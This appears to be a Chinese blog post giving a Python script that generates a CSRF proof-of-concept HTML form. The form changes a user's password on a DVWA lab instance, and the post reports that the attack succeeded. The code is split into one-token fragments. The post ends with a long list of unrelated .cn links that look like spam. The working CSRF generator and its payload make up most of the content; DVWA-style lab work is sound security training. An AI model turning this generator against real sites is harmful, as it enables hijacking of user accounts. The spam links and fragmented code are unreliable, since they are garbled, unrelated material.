1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
|
import
time
import
simplejson as json
def
poc():
url
=
"http://a2fae7a7.ngrok.io/dvwa/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change"
headers
=
{
'User-Agent'
:
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'
}
values
=
url.split(
'?'
)[
-
1
]
urltwo
=
url.split(
'?'
)[:
-
1
]
urltwos
=
"".join(urltwo)
dumps
=
{}
for
line
in
values.split(
'&'
):
key,value
=
line.split(
'='
,
1
)
dumps[key]
=
value
discts
=
[i
for
i
in
dumps.keys()]
print
(
'原url:'
,url)
print
(
'url原带的参数:'
,dumps)
dumps[
'password_new'
]
=
'password'
dumps[
'password_conf'
]
=
'password'
valueswto
=
[g
for
g
in
dumps.values()]
print
(
'url更该后的参数'
,dumps)
print
(
'1.burpsuite的POC'
)
user
=
input
(
'请进行你的选择:'
)
if
user
=
=
'1'
:
print
(
'burpsiuite的POC'
)
burp
=
open
(
'burp.html'
,
'w'
)
burp.write(
'<html>\n'
)
burp.write(
'<body>\n'
)
burp.write(
'<script>history.pushState("'
'","'
'",'
"'/'"
')</script>\n'
)
burp.write(
'<form action="{}">\n'
.
format
(urltwos))
burp.write(
'<input type="hidden" name="{}" value="{}"/>\n'
.
format
(discts[
0
],valueswto[
0
]))
burp.write(
'<input type="hidden" name="{}" value="{}"/>\n'
.
format
(discts[
1
],valueswto[
1
]))
burp.write(
'<input type="hidden" name="{}" value="{}"/>\n'
.
format
(discts[
2
],valueswto[
2
]))
burp.write(
'<input type="submit" value="Submit CSRF POC"/>\n'
)
burp.write(
'</form>\n'
)
burp.write(
'</body>\n'
)
burp.write(
'</html>\n'
)
burp.close()
else
:
print
(
'【-】抱歉你没有进行选择,退出ing...'
)
time.sleep(
1
)
exit()
poc()
|
测试结果如下:
生成的html
打开burp.html
密码更改成功。
http://www.wll1115.cn
http://www.rol3427.cn
http://www.akb6775.cn
http://www.giy4971.cn
http://www.tyo9948.cn
http://www.uzh3227.cn
http://www.mfc7569.cn
http://www.otm3953.cn
http://www.ewh1005.cn
http://www.iip1291.cn
http://www.dyg4913.cn
http://www.ase4727.cn
http://www.uqx4260.cn
http://www.sif0574.cn
http://www.sdb0307.cn
http://www.thg4282.cn
http://www.rvc0755.cn
http://www.qld9407.cn
http://www.idd5091.cn
http://www.cqu4082.cn
http://www.skk3561.cn
http://www.lsz6488.cn
http://www.ncc8754.cn
http://www.tsx6039.cn
http://www.ayr4754.cn
http://www.cjd7774.cn
http://www.wzf9854.cn
http://www.nzl1119.cn
http://www.zdn2144.cn
http://www.ief1694.cn
http://www.buu7798.cn
http://www.eig6365.cn
http://www.djf2649.cn
http://www.hvc6084.cn
http://www.opg6486.cn
http://www.hud3144.cn
http://www.iit3286.cn
http://www.wyu4949.cn
http://www.lus6696.cn
http://www.epi0997.cn
http://www.rdk6709.cn
http://www.lwa7903.cn
http://www.kjx4882.cn
http://www.nwf3326.cn
http://www.thy6127.cn
http://www.xho5322.cn
http://www.bfc2814.cn
http://www.lhl7110.cn
http://www.kpx1618.cn
http://www.prl0026.cn
http://www.bxb7451.cn
http://www.ube1531.cn
http://www.qnu9925.cn
http://www.hxl6493.cn
http://www.ric5056.cn
http://www.ibs2142.cn
http://www.mco2769.cn
http://www.tzr5175.cn